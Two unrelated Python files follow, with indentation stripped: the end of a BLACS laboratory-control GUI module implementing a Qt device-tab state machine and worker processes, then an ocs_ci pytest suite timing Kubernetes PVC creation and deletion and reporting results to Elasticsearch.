self.update_tab_text_colour()
else:
self._ui.notresponding.hide()
self._tab_text_colour = 'black'
self.update_tab_text_colour()
@inmain_decorator(True)
def update_tab_text_colour(self):
try:
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
if currentpage == -1:
raise Exception('')
else:
self.notebook.tabBar().setTabTextColor(currentpage,QColor(self._tab_text_colour))
self._tab_text_timer.stop()
else:
raise Exception('')
except Exception:
if not self._tab_text_timer.isActive():
self._tab_text_timer.start(100)
def get_tab_layout(self):
return self._layout
@property
def device_name(self):
return self._device_name
# sets the mode, switches between MANUAL, BUFFERED, TRANSITION_TO_BUFFERED and TRANSITION_TO_STATIC
@property
def mode(self):
return self._mode
@mode.setter
def mode(self,mode):
self._mode = mode
self._update_state_label()
@property
def state(self):
return self._state
@state.setter
def state(self,state):
self._state = state
self._time_of_last_state_change = time.time()
self._update_state_label()
@inmain_decorator(True)
def _update_state_label(self):
if self.mode == 1:
mode = 'Manual'
elif self.mode == 2:
mode = 'Transitioning to buffered'
elif self.mode == 4:
mode = 'Transitioning to manual'
elif self.mode == 8:
mode = 'Buffered'
else:
raise RuntimeError('self.mode for device %s is invalid. It must be one of MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL or MODE_BUFFERED'%(self.device_name))
self._ui.state_label.setText('<b>%s mode</b> - State: %s'%(mode,self.state))
# Todo: Update icon in tab
def create_worker(self,name,WorkerClass,workerargs={}):
if name in self.workers:
raise Exception('There is already a worker process with name: %s'%name)
if name == 'GUI':
# This is here so that we can display "(GUI)" in the status bar and have the user confident this is actually happening in the GUI,
# not in a worker process named GUI
raise Exception('You cannot call a worker process "GUI". Why would you want to? Your worker process cannot interact with the BLACS GUI directly, so you are just trying to confuse yourself!')
worker = WorkerClass()
to_worker, from_worker = worker.start(name, self.device_name, workerargs)
self.workers[name] = (worker,to_worker,from_worker)
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,[Tab._initialise_worker,[(name,),{}]],prepend=True)
def _initialise_worker(self, worker_name):
yield(self.queue_work(worker_name,'init'))
if self.error_message:
raise Exception('Device failed to initialise')
@define_state(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True)
def _timeout_add(self,delay,execute_timeout):
QTimer.singleShot(delay,execute_timeout)
def statemachine_timeout_add(self,delay,statefunction,*args,**kwargs):
# Add the timeout to our set of registered timeouts. Timeouts
# can thus be removed by the user at any time by calling
# self._timeouts.remove(statefunction)
self._timeouts.add(statefunction)
# Here's a function which executes the timeout once, then queues
# itself up again after a delay:
def execute_timeout():
# queue up the state function, but only if it hasn't been
# removed from self.timeouts:
if statefunction in self._timeouts and self._timeout_ids[statefunction] == unique_id:
# Only queue up the state if we are in an allowed mode
if statefunction._allowed_modes&self.mode:
statefunction(*args, **kwargs)
# queue up another call to this function (execute_timeout)
# after the delay time:
self._timeout_add(delay,execute_timeout)
# Store a unique ID for this timeout so that we don't confuse
# other timeouts for this one when checking to see that this
# timeout hasn't been removed:
unique_id = get_unique_id()
self._timeout_ids[statefunction] = unique_id
# queue the first run:
#QTimer.singleShot(delay,execute_timeout)
execute_timeout()
# Returns True if the timeout was removed
def statemachine_timeout_remove(self,statefunction):
if statefunction in self._timeouts:
self._timeouts.remove(statefunction)
return True
return False
# returns True if at least one timeout was removed, else returns False
def statemachine_timeout_remove_all(self):
# As a consistency check, we always reset self._timeouts to an empty set.
# This must be done after the emptiness check (if self._timeouts), so do not refactor this code!
if self._timeouts:
self._timeouts = set()
return True
else:
self._timeouts = set()
return False
def close_tab(self,*args):
self.logger.info('close_tab called')
self._timeout.stop()
self._tab_text_timer.stop()
for name,worker_data in self.workers.items():
worker_data[0].terminate()
# The mainloop is blocking waiting for something out of the
# from_worker queue or the event_queue. Closing the queues doesn't
# seem to raise an EOF for them, likely because it only closes
# them from our end, and an EOFError would only be raised if it
# was closed from the other end, which we can't make happen. But
# we can instruct it to quit by telling it to do so through the
# queue itself. That way we don't leave extra threads running
# (albeit doing nothing) that we don't need:
if self._mainloop_thread.is_alive():
worker_data[2].put((False,'quit',None))
self.event_queue.put(MODE_MANUAL|MODE_BUFFERED|MODE_TRANSITION_TO_BUFFERED|MODE_TRANSITION_TO_MANUAL,True,False,['_quit',None],prepend=True)
self.notebook = self._ui.parentWidget().parentWidget()
currentpage = None
if self.notebook:
#currentpage = self.notebook.get_current_page()
currentpage = self.notebook.indexOf(self._ui)
self.notebook.removeTab(currentpage)
temp_widget = QWidget()
self.notebook.insertTab(currentpage, temp_widget, self.device_name)
self.notebook.setCurrentWidget(temp_widget)
return currentpage
def connect_restart_receiver(self,function):
if function not in self._restart_receiver:
self._restart_receiver.append(function)
def disconnect_restart_receiver(self,function):
if function in self._restart_receiver:
self._restart_receiver.remove(function)
def restart(self,*args):
# notify all connected receivers:
for f in self._restart_receiver:
try:
f(self.device_name)
except:
self.logger.exception('Could not notify a connected receiver function')
currentpage = self.close_tab()
self.logger.info('***RESTART***')
self.settings['saved_data'] = self.get_save_data()
self._restart_thread = inthread(self.wait_for_mainloop_to_stop, currentpage)
def wait_for_mainloop_to_stop(self, currentpage):
self._mainloop_thread.join()
inmain(self.clean_ui_on_restart)
inmain(self.finalise_restart, currentpage)
def clean_ui_on_restart(self):
# Clean up UI
ui = self._ui
self._ui = None
ui.setParent(None)
ui.deleteLater()
del ui
def finalise_restart(self, currentpage):
widget = self.notebook.widget(currentpage)
widget.setParent(None)
widget.deleteLater()
del widget
# Note: the following function call will break if the user hasn't
# overridden the __init__ function to take these arguments. So
# make sure you do that!
self.__init__(self.notebook, self.settings,restart=True)
# The init method is going to place this device tab at the end of the notebook specified
# Let's remove it from there, and place it in the position it used to be!
self.notebook = self._ui.parentWidget().parentWidget()
self.notebook.removeTab(self.notebook.indexOf(self._ui))
self.notebook.insertTab(currentpage,self._ui,self.device_name)
self.notebook.setCurrentWidget(self._ui)
# If BLACS is waiting on this tab for something, tell it to abort!
# self.BLACS.current_queue.put('abort')
def queue_work(self,worker_process,worker_function,*args,**kwargs):
return worker_process,worker_function,args,kwargs
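# Note: queue_work does not contact the worker itself; it merely packages the request tuple.
# A @define_state method yields this tuple back to mainloop(), which pickles it, sends it to the
# named worker process and resumes the generator with the results, e.g.:
#   results = yield(self.queue_work('My worker', 'foo', 5, 6, 7, x='x'))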
def hide_error(self):
# don't show the error again until the not responding time has doubled:
self.hide_not_responding_error_until = 2*self.not_responding_for
self._ui.notresponding.hide()
self.error_message = ''
#self.tab_label_widgets['error'].hide()
#if self.state == 'idle':
# self.tab_label_widgets['ready'].show()
def check_time(self):
if self.state in ['idle','fatal error']:
self.not_responding_for = 0
if self._not_responding_error_message:
self._not_responding_error_message = ''
self._update_error()
else:
self.not_responding_for = time.time() - self._time_of_last_state_change
if self.not_responding_for > 5 + self.hide_not_responding_error_until:
self.hide_not_responding_error_for = 0
self._ui.notresponding.show()
hours, remainder = divmod(int(self.not_responding_for), 3600)
minutes, seconds = divmod(remainder, 60)
if hours:
s = '%s hours'%hours
elif minutes:
s = '%s minutes'%minutes
else:
s = '%s seconds'%seconds
self._not_responding_error_message = 'The hardware process has not responded for %s.<br /><br />'%s
self._update_error()
return True
def mainloop(self):
logger = logging.getLogger('BLACS.%s.mainloop'%(self.settings['device_name']))
logger.debug('Starting')
# Store a reference to the state queue and workers, this way if the tab is restarted, we won't ever get access to the new state queue created then
event_queue = self.event_queue
workers = self.workers
try:
while True:
# Get the next task from the event queue:
logger.debug('Waiting for next event')
func, data = event_queue.get(self.mode)
if func == '_quit':
# The user has requested a restart:
logger.debug('Received quit signal')
break
args,kwargs = data
logger.debug('Processing event %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
# Run the task with the GUI lock, catching any exceptions:
#func = getattr(self,funcname)
# run the function in the Qt main thread
generator = inmain(func,self,*args,**kwargs)
# Do any work that was queued up: (we only talk to the worker if work has been queued up through the yield command)
if type(generator) == GeneratorType:
# We need to call next recursively, queue up work and send the results back until we get a StopIteration exception
generator_running = True
break_main_loop = False
# get the data from the first yield function
worker_process,worker_function,worker_args,worker_kwargs = inmain(generator.next)
# Continue until we get a StopIteration exception, or the user requests a restart
while generator_running:
try:
logger.debug('Instructing worker %s to do job %s'%(worker_process,worker_function) )
worker_arg_list = (worker_function,worker_args,worker_kwargs)
# This line is to catch if you try to pass unpickleable objects.
try:
cPickle.dumps(worker_arg_list)
except:
self.error_message += 'Attempt to pass unserialisable object to child process:'
raise
# Send the command to the worker
to_worker = workers[worker_process][1]
from_worker = workers[worker_process][2]
to_worker.put(worker_arg_list)
self.state = '%s (%s)'%(worker_function,worker_process)
# Confirm that the worker got the message:
logger.debug('Waiting for worker to acknowledge job request')
success, message, results = from_worker.get()
if not success:
if message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
logger.info('Worker reported failure to start job')
raise Exception(message)
# Wait for and get the results of the work:
logger.debug('Worker reported job started, waiting for completion')
success,message,results = from_worker.get()
if not success and message == 'quit':
# The user has requested a restart:
logger.debug('Received quit signal')
# This variable is set so we also break out of the toplevel main loop
break_main_loop = True
break
if not success:
logger.info('Worker reported exception during job')
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Exception in worker - %s:<br />' % now +
'<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ','&nbsp;').replace('\n','<br />'))
else:
logger.debug('Job completed')
# Reset the hide_not_responding_error_until, since we have now heard from the child
self.hide_not_responding_error_until = 0
# Send the results back to the GUI function
logger.debug('returning worker results to function %s' % func.__name__)
self.state = '%s (GUI)'%func.__name__
next_yield = inmain(generator.send,results)
# If there is another yield command, put the data in the required variables for the next loop iteration
if next_yield:
worker_process,worker_function,worker_args,worker_kwargs = next_yield
except StopIteration:
# The generator has finished. Ignore the error, but stop the loop
logger.debug('Finalising function')
generator_running = False
# Break out of the main loop if the user requests a restart
if break_main_loop:
logger.debug('Breaking out of main loop')
break
self.state = 'idle'
except:
# Some unhandled error happened. Inform the user, and give the option to restart
message = traceback.format_exc()
logger.critical('A fatal exception happened:\n %s'%message)
now = time.strftime('%a %b %d, %H:%M:%S ',time.localtime())
self.error_message += ('Fatal exception in main process - %s:<br /> '%now +
'<FONT COLOR=\'#ff0000\'>%s</FONT><br />'%cgi.escape(message).replace(' ','&nbsp;').replace('\n','<br />'))
self.state = 'fatal error'
# do this in the main thread
inmain(self._ui.button_close.setEnabled,False)
logger.info('Exiting')
class Worker(Process):
def init(self):
# To be overridden by subclasses
pass
def run(self, worker_name, device_name, extraargs):
self.worker_name = worker_name
self.device_name = device_name
for argname in extraargs:
setattr(self,argname,extraargs[argname])
# Total fudge, should be replaced with zmq logging in future:
from labscript_utils.setup_logging import setup_logging
setup_logging('BLACS')
log_name = 'BLACS.%s_%s.worker'%(self.device_name,self.worker_name)
self.logger = logging.getLogger(log_name)
self.logger.debug('Starting')
import zprocess.locking, labscript_utils.h5_lock
zprocess.locking.set_client_process_name(log_name)
#self.init()
self.mainloop()
def mainloop(self):
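# Protocol: for every job the worker sends two messages back to the parent: first
# (success, message, None) acknowledging that the requested method exists, then
# (success, message, results) once the job has run. Tab.mainloop above performs the
# two matching from_worker.get() calls.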
while True:
# Get the next task to be done:
self.logger.debug('Waiting for next job request')
funcname, args, kwargs = self.from_parent.get()
self.logger.debug('Got job request %s' % funcname)
try:
# See if we have a method with that name:
func = getattr(self,funcname)
success = True
message = ''
except AttributeError:
success = False
message = traceback.format_exc()
self.logger.error('Couldn\'t start job:\n %s'%message)
# Report to the parent whether method lookup was successful or not:
self.to_parent.put((success,message,None))
if success:
# Try to do the requested work:
self.logger.debug('Starting job %s'%funcname)
try:
results = func(*args,**kwargs)
success = True
message = ''
self.logger.debug('Job complete')
except:
results = None
success = False
traceback_lines = traceback.format_exception(*sys.exc_info())
del traceback_lines[1]
message = ''.join(traceback_lines)
self.logger.error('Exception in job:\n%s'%message)
# Check if results object is serialisable:
try:
cPickle.dumps(results)
except:
message = traceback.format_exc()
self.logger.error('Job returned unserialisable datatypes, cannot pass them back to parent.\n' + message)
message = 'Attempt to pass unserialisable object %s to parent process:\n' % str(results) + message
success = False
results = None
# Report to the parent whether work was successful or not,
# and what the results were:
self.to_parent.put((success,message,results))
# Example code! Two classes are defined below, which are subclasses
# of the ones defined above. They show how to make a Tab class,
# and a Worker class, and get the Tab to request work to be done by
# the worker in response to GUI events.
class MyTab(Tab):
def __init__(self,notebook,settings,restart=False): # restart will be true if __init__ was called due to a restart
Tab.__init__(self,notebook,settings,restart) # Make sure to call this first in your __init__!
self.create_worker('My worker',MyWorker,{'x':7})
self.initUI()
def initUI(self):
self.layout = self.get_tab_layout()
foobutton = QPushButton('foo, 10 seconds!')
barbutton = QPushButton('bar, 10 seconds, then error!')
bazbutton = QPushButton('baz, 0.5 seconds!')
addbazbutton = QPushButton('add 2 second timeout to baz')
removebazbutton = QPushButton('remove baz timeout')
bazunpickleable= QPushButton('try to pass baz a threading.Lock()')
fatalbutton = QPushButton('fatal error, forgot to add @define_state to callback!')
self.checkbutton = QPushButton('have baz\nreturn a Queue')
self.checkbutton.setCheckable(True)
#self.device_widget.addWidget(layout)
self.layout.addWidget(foobutton)
self.layout.addWidget(barbutton)
self.layout.addWidget(bazbutton)
self.layout.addWidget(addbazbutton)
self.layout.addWidget(removebazbutton)
self.layout.addWidget(bazunpickleable)
self.layout.addWidget(fatalbutton)
self.layout.addWidget(self.checkbutton)
foobutton.clicked.connect(self.foo)
barbutton.clicked.connect(self.bar)
bazbutton.clicked.connect(self.baz)
fatalbutton.clicked.connect(self.fatal )
addbazbutton.clicked.connect(self.add_baz_timeout)
removebazbutton.clicked.connect(self.remove_baz_timeout)
bazunpickleable.clicked.connect(self.baz_unpickleable)
# It is critical that you decorate your callbacks with @define_state
# as below. This makes the function get queued up and executed
# in turn by our state machine instead of immediately by the
# Qt event loop. Only skip the decorator if you're certain that your
# callback can safely happen no matter what state the system is
# in (for example, adjusting the axis range of a plot, or other
# appearance settings). You should never be calling queue_work
# or do_after from an undecorated callback.
@define_state(MODE_MANUAL,True)
def foo(self):
self.logger.debug('entered foo')
#self.toplevel.set_sensitive(False)
# Here's how you instruct the worker process to do
# something. When this callback returns, the worker will be
# requested to do whatever you ask in queue_work (in this
# case, MyWorker.foo(5,6,7,x='x') ). Then, no events will
# be processed until that work is done. Once the work is
# done, whatever has been set with do_after will be executed
# (in this case self.leave_foo(1,2,3,bar=baz) ).
results = yield(self.queue_work('My worker','foo', 5,6,7,x='x'))
#self.toplevel.set_sensitive(True)
self.logger.debug('leaving foo')
# Here's what's NOT to do: forgetting to decorate a callback with @define_state
# when it's not something that can safely be done asynchronously
# to the state machine:
def fatal(self):
# This bug could be hard to track down because nothing will happen
# when you click the button -- only once you trigger some other,
# correctly decorated callback will it become apparent that
# something is wrong. So don't make this mistake!
self.queue_work('My worker','foo', 5,6,7,x='x')
@define_state(MODE_MANUAL,True)
def bar(self):
self.logger.debug('entered bar')
results = yield(self.queue_work('My worker','bar', 5,6,7,x=5))
self.logger.debug('leaving bar')
@define_state(MODE_MANUAL,True)
def baz(self, button=None):
print threading.current_thread().name
self.logger.debug('entered baz')
results = yield(self.queue_work('My worker','baz', 5,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
results = yield(self.queue_work('My worker','baz', 4,6,7,x='x',return_queue=self.checkbutton.isChecked()))
print results
print threading.current_thread().name
self.logger.debug('leaving baz')
# This event shows what happens if you try to send a unpickleable
# event through a queue to the subprocess:
@define_state(MODE_MANUAL,True)
def baz_unpickleable(self):
self.logger.debug('entered baz_unpickleable')
results = yield(self.queue_work('My worker','baz', 5,6,7,x=threading.Lock()))
self.logger.debug('leaving baz_unpickleable')
# You don't need to decorate with @define_state if all you're
# doing is adding a timeout -- adding a timeout can safely be done
# asynchronously. But you can still decorate if you want, and you
# should if you're doing other work in the same function call which
# can't be done asynchronously.
def add_baz_timeout(self):
self.statemachine_timeout_add(2000,self.baz)
# Similarly, no @define_state is required here -- same applies as above.
def remove_baz_timeout(self):
self.statemachine_timeout_remove(self.baz)
class MyWorker(Worker):
def init(self):
# You read correctly, this isn't __init__, it's init. It's the
# first thing that will be called in the new process. You should
# do imports here, define instance variables, that sort of thing. You
# shouldn't import the hardware modules at the top of your file,
# because then they will be imported in both the parent and
# the child processes and won't be cleanly restarted when the subprocess
# is restarted. Since we're inside a method call though, you'll
# have to use global statements for the module imports, as shown
# below. Either that or you can make them instance variables, ie:
# import module; self.module = module. Up to you, I prefer
# the former.
global serial; import serial
self.logger.info('got x! %d' % self.x)
raise Exception('bad import!')
# Here's a function that will be called when requested by the parent
# process. There's nothing special about it really. Its return
# value will be passed as a keyword argument _results to the
# function which was queued with do_after, if there was one.
def foo(self,*args,**kwargs):
self.logger.debug('working on foo!')
time.sleep(10)
return 'results!!!'
def bar(self,*args,**kwargs):
self.logger.debug('working on bar!')
time.sleep(10)
raise Exception('error!')
return 'results!!!'
def baz(self,zzz,*args,**kwargs):
self.logger.debug('working on baz: time is %s'%repr(time.time()))
time.sleep(0.5)
if kwargs['return_queue']:
return Queue()
return 'results%d!!!'%zzz
if __name__ == '__main__':
import sys
import logging.handlers
# Setup logging:
logger = logging.getLogger('BLACS')
handler = logging.handlers.RotatingFileHandler('BLACS.log', maxBytes=1024**2, backupCount=0)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
handler.setFormatter(formatter)
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
if sys.stdout.isatty():
terminalhandler = logging.StreamHandler(sys.stdout)
terminalhandler.setFormatter(formatter)
terminalhandler.setLevel(logging.INFO)
logger.addHandler(terminalhandler)
else:
sys.stdout = sys.stderr = open(os.devnull, 'w')
logger.setLevel(logging.DEBUG)
#labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
if __name__ == '__main__':
from labscript_utils.qtwidgets.dragdroptab import DragDropTabWidget
app = QApplication(sys.argv)
window = QWidget()
layout = QVBoxLayout(window)
notebook = DragDropTabWidget()
layout.addWidget(notebook)
class FakeConnection(object):
def __init__(self):
self.BLACS_connection = 'None'
class FakeConnectionTable(object):
def __init__(self):
pass
def find_by_name(self, device_name):
return FakeConnection()
connection_table = FakeConnectionTable()
tab1 = MyTab(notebook,settings = {'device_name': 'Example', 'connection_table':connection_table})
tab2 = MyTab(notebook,settings = {'device_name': 'Example2', 'connection_table':connection_table})
window.show()
#notebook.show()
def run():
app.exec_()
tab1.close_tab()
tab2.close_tab()
sys.exit(run())
|
test_pvc_creation_deletion_performance.py | """
Test to verify PVC creation and deletion performance
"""
import time
import logging
import datetime
import pytest
import ocs_ci.ocs.exceptions as ex
import threading
import statistics
from concurrent.futures import ThreadPoolExecutor
from uuid import uuid4
from ocs_ci.framework.testlib import performance
from ocs_ci.ocs.perftests import PASTest
from ocs_ci.helpers import helpers, performance_lib
from ocs_ci.ocs import defaults, constants
from ocs_ci.utility.performance_dashboard import push_to_pvc_time_dashboard
from ocs_ci.helpers.helpers import get_full_test_logs_path
from ocs_ci.ocs.perfresult import PerfResult
from ocs_ci.framework import config
log = logging.getLogger(__name__)
class ResultsAnalyse(PerfResult):
"""
This class generates results for all tests as one unit
and save them to an elasticsearch server
"""
def __init__(self, uuid, crd, full_log_path):
"""
Initialize the object by reading some of the data from the CRD file and
by connecting to the ES server and read all results from it.
Args:
uuid (str): the unique uid of the test
crd (dict): dictionary with test parameters - the test yaml file
which the test itself may modify.
full_log_path (str): the path of the results files to be found
"""
super(ResultsAnalyse, self).__init__(uuid, crd)
self.new_index = "pvc_create_delete_fullres"
self.full_log_path = full_log_path
# make sure we have connection to the elastic search server
self.es_connect()
@performance
class TestPVCCreationDeletionPerformance(PASTest):
"""
Test to verify PVC creation and deletion performance
"""
def setup(self):
"""
Setting up test parameters
"""
log.info("Starting the test setup")
super(TestPVCCreationDeletionPerformance, self).setup()
self.benchmark_name = "PVC_Creation-Deletion"
self.uuid = uuid4().hex
self.crd_data = {
"spec": {
"test_user": "Homer simpson",
"clustername": "test_cluster",
"elasticsearch": {
"server": config.PERF.get("production_es_server"),
"port": config.PERF.get("production_es_port"),
"url": f"http://{config.PERF.get('production_es_server')}:{config.PERF.get('production_es_port')}",
},
}
}
if self.dev_mode:
self.crd_data["spec"]["elasticsearch"] = {
"server": config.PERF.get("dev_es_server"),
"port": config.PERF.get("dev_es_port"),
"url": f"http://{config.PERF.get('dev_es_server')}:{config.PERF.get('dev_es_port')}",
}
@pytest.fixture()
def base_setup(self, interface_iterate, storageclass_factory, pod_factory):
"""
A setup phase for the test
Args:
interface_iterate: A fixture to iterate over ceph interfaces
storageclass_factory: A fixture to create everything needed for a
storageclass
pod_factory: A fixture to create new pod
"""
self.interface = interface_iterate
self.sc_obj = storageclass_factory(self.interface)
self.pod_factory = pod_factory
def init_full_results(self, full_results):
"""
Initialize the full results object which will send to the ES server
Args:
full_results (obj): an empty FIOResultsAnalyse object
Returns:
FIOResultsAnalyse (obj): the input object fill with data
"""
for key in self.environment:
full_results.add_key(key, self.environment[key])
full_results.add_key("storageclass", self.sc)
full_results.add_key("index", full_results.new_index)
return full_results
@pytest.mark.parametrize(
argnames=["pvc_size"],
argvalues=[
pytest.param(*["25Gi"], marks=pytest.mark.polarion_id("OCS-2007")),
pytest.param(*["50Gi"], marks=pytest.mark.polarion_id("OCS-2007")),
pytest.param(*["100Gi"], marks=pytest.mark.polarion_id("OCS-2007")),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
def test_pvc_creation_deletion_measurement_performance(
self, teardown_factory, pvc_size
):
"""
Measuring PVC creation and deletion times for pvc samples
Verifying that those times are within required limits
"""
# Getting the full path for the test logs
self.full_log_path = get_full_test_logs_path(cname=self)
if self.interface == constants.CEPHBLOCKPOOL:
self.sc = "RBD"
if self.interface == constants.CEPHFILESYSTEM:
self.sc = "CephFS"
self.full_log_path += f"-{self.sc}-{pvc_size}"
log.info(f"Logs file path name is : {self.full_log_path}")
self.start_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.get_env_info()
# Initialize the results doc file.
self.full_results = self.init_full_results(
ResultsAnalyse(self.uuid, self.crd_data, self.full_log_path)
)
self.full_results.add_key("pvc_size", pvc_size)
num_of_samples = 5
accepted_creation_time = 1
accepted_deletion_time = 2 if self.interface == constants.CEPHFILESYSTEM else 1
self.full_results.add_key("samples", num_of_samples)
accepted_creation_deviation_percent = 50
accepted_deletion_deviation_percent = 50
creation_time_measures = []
deletion_time_measures = []
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
for i in range(num_of_samples):
logging.info(f"{msg_prefix} Start creating PVC number {i + 1}.")
start_time = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
pvc_obj = helpers.create_pvc(sc_name=self.sc_obj.name, size=pvc_size)
helpers.wait_for_resource_state(pvc_obj, constants.STATUS_BOUND)
pvc_obj.reload()
creation_time = performance_lib.measure_pvc_creation_time(
self.interface, pvc_obj.name, start_time
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was created in {creation_time} seconds."
)
if creation_time > accepted_creation_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC creation time is {creation_time} and is greater than "
f"{accepted_creation_time} seconds."
)
creation_time_measures.append(creation_time)
pv_name = pvc_obj.backed_pv
pvc_reclaim_policy = pvc_obj.reclaim_policy
pod_obj = self.write_file_on_pvc(pvc_obj)
pod_obj.delete(wait=True)
teardown_factory(pvc_obj)
logging.info(f"{msg_prefix} Start deleting PVC number {i + 1}")
if pvc_reclaim_policy == constants.RECLAIM_POLICY_DELETE:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
helpers.validate_pv_delete(pvc_obj.backed_pv)
deletion_time = helpers.measure_pvc_deletion_time(
self.interface, pv_name
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was deleted in {deletion_time} seconds."
)
if deletion_time > accepted_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC deletion time is {deletion_time} and is greater than "
f"{accepted_deletion_time} seconds."
)
deletion_time_measures.append(deletion_time)
else:
logging.info(
f"Reclaim policy of the PVC {pvc_obj.name} is not Delete;"
f" therefore not measuring deletion time for this PVC."
)
creation_average = self.process_time_measurements(
"creation",
creation_time_measures,
accepted_creation_deviation_percent,
msg_prefix,
)
self.full_results.add_key("creation-time", creation_average)
deletion_average = self.process_time_measurements(
"deletion",
deletion_time_measures,
accepted_deletion_deviation_percent,
msg_prefix,
)
self.full_results.add_key("deletion-time", deletion_average)
self.full_results.all_results["creation"] = creation_time_measures
self.full_results.all_results["deletion"] = deletion_time_measures
self.end_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.full_results.add_key(
"test_time", {"start": self.start_time, "end": self.end_time}
)
self.full_results.es_write()
log.info(f"The Result can be found at : {self.full_results.results_link()}")
if not self.dev_mode:
# all the results are OK, the test passes, push the results to the codespeed
push_to_pvc_time_dashboard(
self.interface, "1-pvc-creation", creation_average
)
push_to_pvc_time_dashboard(
self.interface, "1-pvc-deletion", deletion_average
)
def process_time_measurements(
self, action_name, time_measures, accepted_deviation_percent, msg_prefix
):
"""
Analyses the given time measurements. If the relative standard deviation of these times is
bigger than the provided accepted deviation percent, the test fails
Args:
action_name (str): Name of the action for which these measurements were collected; used for the logging
time_measures (list of floats): A list of time measurements
accepted_deviation_percent (int): Accepted deviation percent,
if the standard deviation of the provided time measurements is bigger than this value, the test fails
msg_prefix (str) : A string for comprehensive logging
Returns:
(float) The average value of the provided time measurements
"""
average = statistics.mean(time_measures)
log.info(
f"{msg_prefix} The average {action_name} time for the sampled {len(time_measures)} "
f"PVCs is {average} seconds."
)
st_deviation = statistics.stdev(time_measures)
st_deviation_percent = st_deviation / average * 100.0
if st_deviation_percent > accepted_deviation_percent:
raise ex.PerformanceException(
f"{msg_prefix} PVC ${action_name} time deviation is {st_deviation_percent}% "
f"and is greater than the allowed {accepted_deviation_percent}%."
)
self.full_results.add_key(f"{action_name}_deviation_pct", st_deviation_percent)
log.info(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}%."
)
return average
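# Worked example (illustrative): for time_measures == [1.0, 1.2, 0.8] the mean is 1.0 s and the
# sample standard deviation is 0.2 s, i.e. a 20% deviation, which passes the 50% limit used above.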
def write_file_on_pvc(self, pvc_obj, filesize=10):
"""
Writes a file on given PVC
Args:
pvc_obj: PVC object to write a file on
filesize: size of file to write (in GB)
Returns:
Pod on this pvc on which the file was written
"""
pod_obj = self.pod_factory(
interface=self.interface, pvc=pvc_obj, status=constants.STATUS_RUNNING
)
# convert the requested file size from GB to an fio size string in MB
file_size = f"{int(filesize * 1024)}M"
log.info(f"Starting IO on the POD {pod_obj.name}")
# Going to run only write IO
pod_obj.fillup_fs(size=file_size, fio_filename=f"{pod_obj.name}_file")
# Wait for fio to finish
fio_result = pod_obj.get_fio_results()
err_count = fio_result.get("jobs")[0].get("error")
assert (
err_count == 0
), f"IO error on pod {pod_obj.name}. FIO result: {fio_result}"
log.info("IO on the PVC has finished")
return pod_obj
@pytest.mark.usefixtures(base_setup.__name__)
def test_multiple_pvc_deletion_measurement_performance(self, teardown_factory):
"""
Measuring PVC deletion time of 120 PVCs, asserting that bulk deletion stays within 2 seconds per PVC
Args:
teardown_factory: A fixture used when we want a new resource that was created during the tests
to be removed in the teardown phase.
"""
number_of_pvcs = 120
pvc_size = "1Gi"
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
log.info(f"{msg_prefix} Start creating new 120 PVCs")
pvc_objs = helpers.create_multiple_pvcs(
sc_name=self.sc_obj.name,
namespace=defaults.ROOK_CLUSTER_NAMESPACE,
number_of_pvc=number_of_pvcs,
size=pvc_size,
burst=True,
)
for pvc_obj in pvc_objs:
pvc_obj.reload()
teardown_factory(pvc_obj)
with ThreadPoolExecutor(max_workers=5) as executor:
for pvc_obj in pvc_objs:
executor.submit(
helpers.wait_for_resource_state, pvc_obj, constants.STATUS_BOUND
)
executor.submit(pvc_obj.reload)
pod_objs = []
for pvc_obj in pvc_objs:
pod_obj = self.write_file_on_pvc(pvc_obj, 0.3)
pod_objs.append(pod_obj)
# Get pvc_name, require pvc_name to fetch deletion time data from log
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
process1 = threading.Thread(target=pvc_name_list.append, args=(pvc_obj.name,))
process2 = threading.Thread(target=pv_name_list.append, args=(pvc_obj.backed_pv,))
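# note: list.append is atomic under the GIL, so these threads are for symmetry with the
# reload loop above rather than a necessity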
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
log.info(f"{msg_prefix} Preparing to delete 120 PVC")
# Delete PVC
for pvc_obj, pod_obj in zip(pvc_objs, pod_objs):
pod_obj.delete(wait=True)
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=self.interface, pv_name_list=pv_name_list
)
log.info(
f"{msg_prefix} {number_of_pvcs} bulk deletion time is {pvc_deletion_time}"
)
# accepted deletion time is 2 secs for each PVC
accepted_pvc_deletion_time = number_of_pvcs * 2
